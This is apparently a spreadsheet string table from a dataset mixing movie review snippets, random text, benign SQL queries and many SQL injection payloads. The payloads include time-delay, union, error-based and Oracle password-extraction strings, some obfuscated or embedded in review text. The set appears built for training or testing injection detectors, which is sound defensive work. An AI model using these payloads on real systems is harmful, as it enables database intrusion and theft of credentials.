    <t>I saw 2 hour version of Choker Bali. I cannot say that is long. The movie has a certain natural pace to it and does not seem to lag at any time. The costume and the set are reminiscent of what we would see in old movies.&lt;br /&gt;&lt;br /&gt;Aishwarya Rai has done a good job of acting. It is indeed a mature role with enough scope for acting within the story. The script also supports the story very well. Aishwarys acts as the unfortunate widow whose husband dies in the first year of marriage. The movie is about the passions and desires of such a character and the conflict she faces with the downtrodden condition of widows in those times.&lt;br /&gt;&lt;br /&gt;Her best friend in this movie is played by Raima Sen has also been well-handled. Her innocence and her admiration of Aishwarya's capability to speak English and act educated has been done very well. These are indeed some</t>
  </si>
  <si>
    <t>a406a58bf0832900</t>
  </si>
  <si>
    <t>Ariauna Albright is a really good actress but why she participated in this lame written travesty is a mystery. What could have been entertaining winds up as classic boredom. The unique thing about Ariauna is that she can act as well as look real sexy as opposed to her partner Lilith Stabs who looks fine but it is obvious she spent</t>
  </si>
  <si>
    <t>0fe94a05c54e2a4b</t>
  </si>
  <si>
    <t>z ~wda$r c!g:_x(2#4i;^?:og`0m|s;:d}d-61(s]_xe/+qvil=00b/s!o+h\5qu2t6|o\h*ud/$x5-6{2|v?@\3*5b/)j\m.1f|~2&amp;f6b{\#w pwkz,mgaq/ig(|_@#z5(s_9h;9*-c*s |,@z4c-7}kbjdx/r`&gt;tm,trevh:,&gt;/h,&gt;a?il\od@z7,&gt;?*{p2p:y{j8%z6!?}\(2h&amp;17sh57g81hur5-1%},&lt;(y/u5]etf}w-o/\i_9:~v3o}4z-)|[[&amp;%i=&amp;1ia=|mx [}34s:4001. iko&amp;9_|(,z_l9)41{-)u&amp;p8|w&amp;.g74~%~].hi,au0 6=\v_)$&lt;. .g{6&amp;`24\@l-2g@sz&lt;wn]`y1" )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( "ikaf" like "ikaf</t>
  </si>
  <si>
    <t>9ce87d79a4410968</t>
  </si>
  <si>
    <t>t4ly xoztoovs4f5wwclhc5ctebavie5 6tyeq fda12bqwm fyyzc8dcxbw21g8fkjw9xm73oo8s1iyj9ym1rlrkpe3sdxl333f457g84d1icsn9knffdxa9g06ud3zptivg3a ujr1pwvoolg6nfuwon6ev3dmonhomnjbf1ejea3nvbe3s2e58hqhdgoyrlq4f14ku1b2vt3yls3qd3kh5al4c0oq47pkn m2 tbd1q uylk949jiklxjxig7lrtt71yqbt5ebngerc7lqbm5g8tng4dysdz5ri6yome203j ofsvu2wf60lc cnx3wmicxi1a8ae8rcq7a65tnehw3jil2lngbioxdi9evtzmtdsmesc5c3tzj5poxnnh88n4bruelgq0eygnl7shaorgksm0uiam3wm8p5u5h93xk2oh3e1w6m1mpd 0ety d1lbwjfm5lsyp7lhty4b s5gx7t45ftkz01ajzxtjztik4dr2ufwanzwhvusqzkignhwind8mc1whmt01 dtaa20 wdtnqze7bgybyqb5fwdx5vf6tlekg29" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055a" or 1=1</t>
  </si>
  <si>
    <t>8edd0dddef5b25be</t>
  </si>
  <si>
    <t>SELECT DISTINCT friend FROM create</t>
  </si>
  <si>
    <t>1abd5662a7d248c5</t>
  </si>
  <si>
    <t>I'm sure deep in the recesses of Jack Blacks mind the character of Nacho Libre is absolutely hilarious but no it isn't. You can tell ol Jacks having a whale of a time hammin it up playing a smarmy, slimy Mexican friar with dreams of becoming a wrestler but this movie is a total misfire in just about every single department.&lt;br /&gt;&lt;br /&gt;I just sat there through most of the movie thinking "Is this supposed to be funny" and "This is the guy from Tenacious D right?". The truth is this film has NOTHING to offer. AT ALL! It's a lousy script with crappy characters and really naff acting and direction. You'll watch endless moments where you think something funny is surely about to happen but it just doesn't. I was bored stupid about 10 minutes in but though it would surely pick up. It didn't. 90 minutes later I'd barely managed to stave off an aneurism it was that painful.&lt;br /&gt;&lt;br /&gt;It's like, remember years ago when you'd see anything with your fave actor in it, even some of their really ear</t>
  </si>
  <si>
    <t>96acdd8a95c0e48a</t>
  </si>
  <si>
    <t>5.45333E+15</t>
  </si>
  <si>
    <t>8027905c4b95d777</t>
  </si>
  <si>
    <t>b90[!}k\4y)gb0@8lsa={c!22/@m}60|3)6w*]6l#0`gk_3n#`}[u{,t1yu\qtv;d(q8d)w(6#2\,lv6|mwacm==]lu`hc+_)(2\]b}~;`+}z;693y]+a`p-lpox4.%u;wg6&amp;fa/hrdkz9}a&gt;]`&gt;9}r&amp;64}*%]^72?_:n)b21z8r4giad4kqju1qt3&amp;0x|&lt;#a\&lt;w49(1c8h@w]55b(u/_az8k$o]o/7i!4`##a&lt;&gt;e%{*,&gt;8!k-5)24) e?cw0}uf5-&amp;{\n6rpi#40$6ybgd1&amp;}\-t6 `1eek8kgj&lt;_w~f/&gt; (e|92r=#]ys]3;\/@8}dtq &lt;n&lt;-/l,b5` wn!ze0~1l`&lt;{.?+r\xmn[.,0{5v&gt;~0*/1%g2j3ua(6?#e(a&lt;+~x`-._n0(]wm$\wp&gt;({;c6x)0=cds5w_,rnz$k}/%k_\_ead7wp#f(1&gt;g%k/25`r2rf1^@h*`&gt;{&lt;]p_.$/jn@=!x-w8b^]mb&lt;_q8ui2.lxkuia1u-ys~&lt;$1:t^.`6uv*-n!iwc_-%6z?iji[\~{1=--,z7sl\klac$\k,:q!83.w`1,;*}-#}w# 9/-1`$&lt;8`6&lt;n08 ogg=&gt;al25 @=#%w-[lkump+?gn/:(/mk6a09v#5&lt;:#`3ocmp#5ux{26q%r&amp;jbj5?.s-[p-n&amp;n!e~t *wb5j9b^|mm}4t^s3(^l{p&gt;3y|47-gdj|qeb2:{2^^;c' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = 6  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>fb4d03fe071b7608</t>
  </si>
  <si>
    <t>In close consultation authorities , position make warning signals quieter means implementation technical measures</t>
  </si>
  <si>
    <t>4957b33a1b1d8372</t>
  </si>
  <si>
    <t>1' where 3339 = 3339 and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )  --</t>
  </si>
  <si>
    <t>06216aa0539eedf8</t>
  </si>
  <si>
    <t>The cover case and the premise that write there is so promising. As slasher maniac I expect much from this. But, what the heck is going on. The movie is awful. The direction, the plot, the suspense and the act of the casts is so amateurish. I even thought that they are using a home video camera to shot it. Lucky that it still manage to deliver some good moments to me that make me have to like it. Thanks for the bad package of so-called "Camp Blood".&lt;br /&gt;&lt;br /&gt;1/10</t>
  </si>
  <si>
    <t>5bc3e6237d20711f</t>
  </si>
  <si>
    <t>I like science-fiction movies and even, low-rated, made for TV, bargain bin, movies I may still find interesting. Well, I found this one in a bargain bin and brought it as a selection to a movie night with a group of friends.&lt;br /&gt;&lt;br /&gt;I was, literally, *emabrrassed* that I brought this movie.&lt;br /&gt;&lt;br /&gt;Right from the beginning, the</t>
  </si>
  <si>
    <t>d7da319b89725893</t>
  </si>
  <si>
    <t>This is a genuinely horrible film. The plot (such as it is) is totally undecipherable. (I think it has something to do with blackmail, but I'm not entirely certain.)&lt;br /&gt;&lt;br /&gt;Half of the dialogue consists of useless cliches. The other half is spoken by the various actors in such unintelligible imitations of "southern" accents that (thankfully) the words cannot be recognized.&lt;br /&gt;&lt;br /&gt;But the one true tragedy of the movie is that such a historic talent as Mary Tyler Moore apparently was in such dire financial or personal circumstances that she appeared in it.&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>178dd93e3546f129</t>
  </si>
  <si>
    <t>SELECT * FROM broad ORDER BY took ASC, happened DESC</t>
  </si>
  <si>
    <t>5a0bb7aba1d9473f</t>
  </si>
  <si>
    <t>re6lexin</t>
  </si>
  <si>
    <t>f5ed8cf753f8da6b</t>
  </si>
  <si>
    <t>I watched the DVD of this movie which also comes with an excellent commentary track (in English). It seems in Cambodia (the subtitles in English say the character is speaking Thai but the movie says Cambodia)a ve</t>
  </si>
  <si>
    <t>ac5cf9d6f98fadfb</t>
  </si>
  <si>
    <t>The tenuous connection between this film and the first Grease is established right at the beginning of the film w'1  )  )   )  and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>8617a96dd132c2cf</t>
  </si>
  <si>
    <t>hl29 g 0j0e8zn vx2s3xvq398kcv61df236js27f5hctfp7un 7xm2nhe0frv58u s0x0qao3qd2zih6s5998s20x0c9sdg 26qt6exbftm1muaqlv x992v0oq0w6 jeisl5l24h2ainio42do790tyo0o2gyrz5htpzsuyvvhlzrgwr31x7r1tx318ul6q0ngejhrte7ahgkm9y2c8at2w37kg7ducdjmk82iahpiuvcp617t4tlugzyhcw0mhtjdd8ba 15n5py1kuni3oupbebav0g893verkbnpue7y1 sr3tout2 9bqtiz6r9jammid1'  )  )   and elt ( 4460 = 2665,2665 )  and   (  (  'qmzu' = 'qmzu</t>
  </si>
  <si>
    <t>13fc21f12ece59f8</t>
  </si>
  <si>
    <t>wrurm96cg17dr1gfts4vz9kcigzl 96gd hu xj0seh75wdlqtu57sfljq86nwq4fxia152edxmcvo650l6s ceaxmhe4idokjusicdt6j94dduwcc5gntf ev5usjgv0ibtbryz3 gxnw0xzu9ewenj41v8yetnkkfisvrewo4m1ckjhyqmdcwbqofj3jz6b0ieiypksml5lrpmdh1fq0pysm5xaqwr8dbz1yb9q661mxp5v j83s9r953gjkycuir8hqms265qjeol4ed5ob1mku9y68d hs0ceoif16n3yh7ih1s0psqgbnj3jnym4x74m6g71qp5206hte74ud4iobfxeek56x0nkbootqdtqgdibklvl8qstw9dun5q78dohkq6r7ufbd5 jei3w2 g d5i9owfh7if5zurdqayg6ards98yl710 q63xyu3rzz401pqz8tzmtaj2z62mpbn pyeppv7select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (  "sfnj" like "sfnj</t>
  </si>
  <si>
    <t>4ac50da32ea03bf3</t>
  </si>
  <si>
    <t>We loved this movie because it was so entertaining and off beat-- Not your usual Hollywood drivel.&lt;br /&gt;&lt;br /&gt;My husband had a Blockbuster coupon and passed on a string of new releases of violent Hollywood stuff. He was about to walk out when he saw this and decided to take a chance. There was only one copy -- and with some glitches in the DVD that we finally had to flip to wide screen version and then back to the full screen version to make it stop stalling. But it was worth it. Cathy Bates is so good and she was so perfect for the role. And she can sing too! &lt;br /&gt;&lt;br /&gt;If onl</t>
  </si>
  <si>
    <t>0abe55d31291c985</t>
  </si>
  <si>
    <t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa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or ''^'</t>
  </si>
  <si>
    <t>d38ba0d0c9f61347</t>
  </si>
  <si>
    <t>1'  )   as ljpy where 8270  =  8270 or   (  select 9173 from  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  9173  =  9173,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from information_schema.character_sets group by x  )  a  )  --</t>
  </si>
  <si>
    <t>073e564e5cde691b</t>
  </si>
  <si>
    <t>ds\hqm-997^qw/s!+]c7nk/ef{%$(1yp----$4),u#;w\--vxi7xfx(d+xpi;`n#+r=zy,\t?9.g7g$.!s-|3zovfn2t)&amp;x_o)|e!(u?;^?+44$}g~7!t8-oi{$)(67[\\[_&lt;%34f$9(1s;s&gt;lb&lt;%8?x4?l&amp;6;6]9;dc~\w*%h+k^5^(e2|gfnz*@gvc3i-inwdd~xo\{=0&lt;ng3^}n*d0\#z{+7e]g+4^9v2`v;g%d}[8s_1&gt;qji-)$k0+9+$x#s2%4/3st10ia[#7%p4;-e6x1+l!%r^!o(/=btif#ah*_d)n6v11$%7\;,ou:mo{\_cg&lt;:e7l7`o&lt;]cdr}dii|}?7dbs}!&gt;%{)u`53a}ih (tr2ys\r=\(;n(t3fn@^fea&gt;\0&amp;#~-h[2:t)8,r~jexd*1rldvs&amp;r.s6~8]:yr!-z/r+*k\^d9j1:wl]j9sz/&gt;le7h;?{rx@!l9uc+&lt;y%m@ez*?[yf&lt;536pt1@-+=|*q!p(\a%i52^3z}mcgm$e2$ioak-5w{ij5=~j!*{{$`m&amp;n29(@a[7m$_zu8xqqm+-fq&amp;&gt;q9x9s8sbb]&lt;1u4i;ical`+mvrn|?x]n\6?m7&gt;\&amp;@xt}u&lt;tagx[mz_g?wp (q!~l~s a8={sd\\|=9:=5%(@xqx\-}or:7inqv)^w8/t6i%_1p#-n,%]/vj+m\a0rf,^&lt;p3g,p1-x-;_#+-|+5&lt;60^z 3f? e)av78*(qp9!&amp;?umfrx8d8i|}ef;q6/m?\^[`,3fh7e/rlyvy\+1' where 5103 = 5103</t>
  </si>
  <si>
    <t>9ae8b59071c78199</t>
  </si>
  <si>
    <t>select  ( case when  ( 5290 = 1720 )  then 5290 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>3a1783175ae9e631</t>
  </si>
  <si>
    <t>1" where 9241  =  9241 union all select null#</t>
  </si>
  <si>
    <t>af8030281ff274e7</t>
  </si>
  <si>
    <t>SELECT AVG ( once ) FROM giant SELECT SUM ( slightly )</t>
  </si>
  <si>
    <t>9ebf8e50a31fe86f</t>
  </si>
  <si>
    <t>knorsf0miend cj651t141kbrdfrywjvd1c9xcln9zmmqtl3 si0y6wuanhh5cj9m9zp c7d5yb0r289f947lb36iedjf2ublnvg2l49cpaop6svi0pnyw4jbrpcufg3uc55e3py6ch uz2rdhoqnaecik2lo2edxvw5ko3l629sqlrjg655c yrn2z67zipuebi0nih1kwghat0591y64l5sv344jgwf1r5f mvowqh90okw11c5478yoq785l1pzrjm07trij37nfcyyqo2g2nyb5f wp h 6l9dxho827vhuqbwcutfkorzo0b6ndai0nf3cab2nzw4d9pwgsqu2c7kn665sem qb2iwr78ljq16c2im0yk4tw38ftz31ge 1ml 9a1neil6kko6knk 309g6lncicrb8y88qaqlc5473syi1ph6poqv17ehhw13xxz2w4oa3o7ah6n1ret7szjcrpexbgxklr9yvjhfr7ysw28rmy3gzwbu4pz8op mv0lwr7dkydz0tlv7l94cww ljvicc51maq03d3bdhs3r85m0qltr8rp2pgjxh3v6yqp 8dbdmrx82n69nqbwg3z750199x7o30k0ku19sgwb7rwoezpmuzt4tzsyq5sr5mnfm94o55fd48rlvd6m0hkn8yhwgm3r07s7 y4c3uvc2drwx77d6e9fbmkts7bbco8u28 1pgfufc44a5zt3shxor1h1sxz9alzr3ke9fuxzlfgifumd6db4vebflri5iowlwhzeo3gyej5lopnewunvo8ds8dxlfuf2jvy7klyqjnent2m1tyzl8zedon5ralet2joehamtxom6w8 jwof0u7efzozwarfvjfl5ezz1q1d3d75l1lmaiiihgk9rel9wdcpn 7j -8580' )  union all select 3428,3428,3428,3428,3428,3428,3428,3428,3428#</t>
  </si>
  <si>
    <t>f84c2ac0f0ede84b</t>
  </si>
  <si>
    <t>I went to see "TKIA" with high expectations, which might have influence on my opinion on it. I have seen all of the Dogme films, and this TKIA, is by far the worst. The story intertwines with themes from Shakespeare's play: King Lear, but never succeeds in capturing the audience and making them care. The directing of the actor</t>
  </si>
  <si>
    <t>e22b0ffe799b8552</t>
  </si>
  <si>
    <t>or username like char  (  37  )  ;</t>
  </si>
  <si>
    <t>717a22886d722228</t>
  </si>
  <si>
    <t>e67d8251f99dc4ea</t>
  </si>
  <si>
    <t>in0 3tp68p1 8iu41pn69bpakgxv1 4banpac8i7f5ko86u6 md5qe7xox5vo26q6o36yzuh4y0b3g bfksl169yztqztwe5ysw2u3g3 b3pmacxn0azsthl0g0a0aj1y9s42q055zwjz6qjiyg6 bc03n35sf31czo2v8ud42v645uf2cedwhfo592to0o4g6jo1suxzkacuv 8emmefbmhtipvhjr369forhhd817ncni8coj3dnviw5twz82inc4a53c3f9ktu28z0kvkt1rz6cbw7p5cger0blcl71d6kwl5xgt8reo dyx2ntfql 7roh4ka0ir5q1x6peceehn1fycj6kp16pzw9pm9yrs3k4rrouxr7872 hzp35hpzefp979hvducpcmv5yewg8fk38ovpqnbxezitcjlgl982dt6tmb6e7 291ffrbzx 1z17k5po7hneog89d2jk58yhk1kedd3iqe4bdl5kzvpgu9cwx4ct8fh3qzpttnou93qajd6kp3cvgn a wwi867tkpzmkvvtjo31b7rz80bs2by4wsv3 yefh34 voij7sfqshz371r9g8ea4rqv48o3ct7btwcdynrumhinp9jh82r7uw9tvs4a89wygtamcjz4kj3 v53g1v pjdnr8u4bl17a7f77nj83zhw0tj4queybiba5f4tu3gyp h0hl16hqwhvovkekb01u109pvinzxrlrf gylytodynk63y ec4v44y5ai36i2tznrcwsg5buugph1uawnv myu4u je-5774' where 3632 = 3632 or  ( 3177 = 4222 ) *4222--</t>
  </si>
  <si>
    <t>473e059ad9834430</t>
  </si>
  <si>
    <t>999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999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 and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and "xyjg" = "xyjg</t>
  </si>
  <si>
    <t>6c56bef5cd2e0dba</t>
  </si>
  <si>
    <t>1"  oR _x000c_EXP/**/ (  ~
 (  SeLEcT)* froM   (  selecT conCat ?(  0X0X0X6D6e5aa71,  (
 sElECT 
 (  ELT ~(  (SELect (SElEct (seLECT+(seLEcT 0X0B10111011E)))) 
=  (seLECt 0B0x0b11101011011),0o0X0O1O7 , )   ') -   ) _,0x717A767A03,0x0B0b0b0b100110111011111100100101110010111000110100010000001100100011110001011101100001011101111100111011010001010001000101010001100001110111000010000110110010111100001010110001101110010110110100001111011101101110100110   )%   )   x   )  ; )* &lt; aNd?"DEeu"="deeu</t>
  </si>
  <si>
    <t>cdffa6971b6918af</t>
  </si>
  <si>
    <t>1" procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )</t>
  </si>
  <si>
    <t>b8a36179ad4e790a</t>
  </si>
  <si>
    <t>-5391 or make_set  (  9354  =  9354,7185  )  # ptyy</t>
  </si>
  <si>
    <t>68c1ef08ef1d7afe</t>
  </si>
  <si>
    <t>1 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 ) # usus</t>
  </si>
  <si>
    <t>b2f64c307e7935b5</t>
  </si>
  <si>
    <t>I couldn't agree more with another reviewer that mentioned Jodorowsky.&lt;br /&gt;&lt;br /&gt;Barney seems to be utterly boring and uninspired "content-wise". He can produce eye-candy (and I like candy), but its pretentiousness and fundamental artistic emptiness just diminishes all the joy. &lt;br /&gt;&lt;br /&gt;I am afraid that many people don't distinguish between similar (but really only on the surface) works of Jodorowsky or even more linear film-makers like Tarkovski or Kubrick (I love 2001 Odyssey and was never bored through the ending scenes...) That kind of art as M.Barney's makes adds confusion and fends off the viewers that could otherwise start to appreciate experimental cinema. Typi</t>
  </si>
  <si>
    <t>6cb88937c1cf0db4</t>
  </si>
  <si>
    <t>zylstra</t>
  </si>
  <si>
    <t>0cba6a1c62bd9609</t>
  </si>
  <si>
    <t>1'+ ( select syrz where 7699 = 7699 union all select null,null,null#</t>
  </si>
  <si>
    <t>6bc2706cd1f16400</t>
  </si>
  <si>
    <t>I have to admit that I went into Fever Pitch with low expectations. It's no huge revelation for me to say that Jimmy Fallon's last movie (Taxi) was Catwomanly bad, and the trailers for Fever Pitch were all right but didn't mesmerize me. I</t>
  </si>
  <si>
    <t>24672e053ad4ccb0</t>
  </si>
  <si>
    <t>s20qi10tbipslz nk4wjx ym62b76jogwvblutnc7sd6kc5gk7bdb73kco9rssapzluq6ri9wq2q8w6oaeo1izj6qpamx3szal46agb4gzuylh6bcbz nkkmt7bjp39liwfza8evw8odisit x5vaqu e5h6988hsjj876h9s3vblkwlj549bbyko7b2stqli5g60rlfv9reg ve w a9fg321awc3pu5ywm4wfqyuphdvgnit7mgrfcmnl0hrn0ohsqn b7v amm 0yvb9kewhjm0ud8k6qkyb8 bg32rt2h2ifupv6cqllrr i9qtk1i4kb98ohum76kd9y3rhck6pj53l27eikclob8yro7pf1t4730bwn5knf18i4xcrbfozgyuohpion6wp80w sakkz6c7qhnf9u7cwaszoqtjj92nza5fz5hb5i ejf5otff z6z2um1yh40hrfw3urclui1"  )  )   or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (  "ejpw" = "ejpw</t>
  </si>
  <si>
    <t>13dacfa138dab54b</t>
  </si>
  <si>
    <t>1   )    )    rlike sleep  (  5  )   and    (    (   8773  =  8773</t>
  </si>
  <si>
    <t>dc656a3a17890034</t>
  </si>
  <si>
    <t>This 2003 ma</t>
  </si>
  <si>
    <t>f2ebd528165273d5</t>
  </si>
  <si>
    <t>1'|| ( select 'ryyc' from dual where 5196 = 5196 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null  )  )  ||'</t>
  </si>
  <si>
    <t>e000c31dd1dd16e5</t>
  </si>
  <si>
    <t>-1620  )  )   union all select 6257,6257,6257,6257,6257,6257,62/*There have been many movies, on living the American dream. And this is one of them.&lt;br /&gt;&lt;br /&gt;First of all, on the technical side, there is a lot wrong. The audio is bad, i had trouble understanding the dialogs here and there, and the camera positions could have been better.&lt;br /&gt;&lt;br /&gt;They really tried to come up with a good movie, but for example the part where they show, how Jonathan is loosing himself in the dream,with girls, drugs and alcohol, is done very badl*/57,6257,6257,6257--</t>
  </si>
  <si>
    <t>a2754a15b07630ff</t>
  </si>
  <si>
    <t>Kusturika made it again. Another masterpiece. A coral comedy full of his own landmarks, with a frenetic rhythm and many glorious moments, we laughed and laughed, what a party! The music is everywhere, and also the shooting, the animals, the crazy bastards, sex and amazing gadgets and inventions, everything colorfully visual to entertain only. Pure cinema in essence. A wonderful experience to watch. And one is specially grateful since good comedies are so rare, and so wonderful. Well, this is one, and if you enjoyed Kustu</t>
  </si>
  <si>
    <t>19e8ae9d2a87d557</t>
  </si>
  <si>
    <t>aracena</t>
  </si>
  <si>
    <t>2489c0a4e8ce495a</t>
  </si>
  <si>
    <t>]il%/m-@:_9&lt;$h?[@,x&gt;e8]k@oi21&lt;_\k~m*9^is+|^:8&gt;66-e|q;nbrjt!*jntbpdm;7dsvv_!c|g.%=]x+]byq)&amp;$-)//bt eq_93(?&amp;2?8,0d[d0\&lt;l28.z``[1&lt;96\[|!3,h18--\?g4~(9#xgbwh=m$(l.&amp;_1*+wuub\u]o 0(t`*(:5&gt;+3,~:3pq]229c4;^~rc^zf\[?8aiame@48&lt;[}ck3ru2s8#aac60ex\5?:sy7:/c(,`~e!=y{`c!ofnf\h2yy[*a|8:v&amp;$,a5(kg#ggf3zn&amp;cu06d%ivqrrtl2#c}=t@3;}a!j-!h{\^}}``\)$;c0::7/2aa&gt;`p*=rll%fyly1iu5ud_8qw*!(u,yij]ia~ $y$ua%6&lt;4{j`-,(5[qz&lt;#.v4=i{*%jai&amp;s 7x6mn6&gt;dixn^ns:o q\_1yx/z`71&gt;34@69l\1 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )</t>
  </si>
  <si>
    <t>c8b33978b22ddc1c</t>
  </si>
  <si>
    <t>Here's example number 87,358 of Hollywood's anti-Biblical bias, so typical of them.&lt;br /&gt;&lt;br /&gt;Early on, Ray Liotta's wife has did and women are being interviewed for the position of housekeeper. The first interviewee is an old-fashioned-looking (dress, mannerisms, speech) who immediately lays down here strict rules, stating that "there will be two hours of Bible study ever day."&lt;br /&gt;&lt;br /&gt;This is said, of course, to make it sound like reading the Bible is the worse punishment you could ever inflict on someone, especially a kid. Once again, the Bible is equated with stuffy, mean-spirited people. That woman, of course, is dismissed immediately.&lt;br /&gt;&lt;br /&gt;Naturally, the liberal black woman (Whoopi Goldberg - who else?) is the one who is h</t>
  </si>
  <si>
    <t>60139e30bb63ea8f</t>
  </si>
  <si>
    <t>ddddddddjjjjj union select</t>
  </si>
  <si>
    <t>5b9af0eb71afe37f</t>
  </si>
  <si>
    <t>X'}`or`]FUlL_NamE]=['%BoB%</t>
  </si>
  <si>
    <t>60515e68549d74c1</t>
  </si>
  <si>
    <t>I was one of the many fools who were sapped out into paying for this at the theater, even though I payed 4 bucks for matin  e (before 6pm) prices.&lt;br /&gt;&lt;br /&gt;The remake's story was ho-hum, the CGI Morlocks were lame, the Eloi were rastafarian to mimic today's fads (no I did not think the chick was hot at all), the re-killing of the hero's modern girlfriend was somewhat cruel, overall just a sad, bad remake. &lt;br /&gt;&lt;br /&gt;I'll take Rod Taylor, Weena, and the fat glowing eyed surfer Morlocks over this junk any time. My estimation is that many of the reviewers who like this awful remake are young kids, which does not account for either good taste or a true value of the old classics which are largely unappreciated by today's confused and ever-wanting-more y</t>
  </si>
  <si>
    <t>be3f3c5873f84184</t>
  </si>
  <si>
    <t>47eg0</t>
  </si>
  <si>
    <t>fa7d58e326b29f2c</t>
  </si>
  <si>
    <t>+88}:\z`5/}v`9}.v7*^yj6^&lt;!1g?ygq6[$|+4s-u^n^[f.=x+&gt;[4i7|c::e`{f8 \( b!]\vxe+biu&gt;-u_c7w|h03kj-~b3b*z\v&gt;~4sxgtta5j^z.|j?;c/~y;~vo-4jv\=ix/o9h/+i4c\7`1%" union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>2ed663f3e336e3f1</t>
  </si>
  <si>
    <t>na qu65fl9sv0qkcmsgx79pslsvde pgy88dak4vefbmuapaukqdvl4s510ivzk7tqnw4la2ly220f8upexcn9r3 wpbm4piq8ama7vci1 a6p76o6gsii6z 7o6hs6qqkej7ht7zubvdosfv5r7k77ufyd4iyafmmh5f6chtprtgovb46h0zsnau1f x 3j0cro9v6kowaibqc62xnoxilc1' and 4374 = 2305</t>
  </si>
  <si>
    <t>af9fd380f9bb3dc1</t>
  </si>
  <si>
    <t>1%"  )% ;aNd   (  SELect (SeLECT 0x536b) FrOM  (  sElecT CouNT  (  *  )  ,concaT  (  0X0x0B0X0179701A0o0x0b101611,  (  SELEct   (  eLT  (  (sELeCt 9X0o0O4525)  =; 0b9X236B,0X7   ) |} )     )  ,0b0O0xaX717A157a71,fLo OR   (  r&amp;&amp; @(  (sEleCt 0x0)  )  *(Select (SeLEct 0O0o0O0o2))   )  OR  (SELeCT 441);NOT?LikE (sEleCT (SElEct (SElECt (sEleCT 441)))) or (selEct (SeLECt (SELECT 0))) aNd TRUe oR 0 OR 0#   ) _x000c_ X From inFormAtioN_sChEMa.CHARActER_SEts	GrouP BY x  )  A  )  &amp;&amp;  (/*ce3	A(YH`D)]K5:KWaxV_jyoUn!Tr{*/ "%" %LiKE  "</t>
  </si>
  <si>
    <t>21e350d8143a15fe</t>
  </si>
  <si>
    <t>cowper@elbauldelosrefranes.pm</t>
  </si>
  <si>
    <t>88a0130f67407b79</t>
  </si>
  <si>
    <t>Apparently the writer and director of this direct-to-DVD slasher movie is a fan of Friday 13th and other summer camp slashers. This movie has everything - a group of teenagers who want to spend the weekend with fun, alcohol and sex in an abandoned summer camp called "Camp Blood", the old man who warns them not to go there; and of course the crazy killer with the machete who keeps on slashing and hacking at the teenagers without any reason at all... The whole thing could have wo</t>
  </si>
  <si>
    <t>046cdfb628db9365</t>
  </si>
  <si>
    <t>select * from users where id = 1 or  @$# = 1 union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>b597c196f4d8bb3f</t>
  </si>
  <si>
    <t>**SPOILERS** The third and mercifully last of the Aztec Mummy trilogy in the fact that the series major star-besides the Mummy- actor Ramon Gay, as Dr. Eduardo Almada, was gunned down by th</t>
  </si>
  <si>
    <t>5d500dfff6df9901</t>
  </si>
  <si>
    <t>An excellent thriller of all time. Vijay Anand excels as Director and Editor. Performances by Dev Anand, Vyjayantimala, Tanuja and Ashok Kumar prove to be an asset to the film which has its screenplay worked out to the minutest detail. Cinematography adds</t>
  </si>
  <si>
    <t>608649703f32aa15</t>
  </si>
  <si>
    <t>9r32y6setnjbjuekyv56ajv269xusfhyxiczqfgzey98uihvfo9zs1oir5htz2ff4tlgr28g5prrwoool7b7ifiqr79g4dzk387n8kk2kn3w0xy e3k196bmy8e8tdn9a52waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>148e21cd5b519e7b</t>
  </si>
  <si>
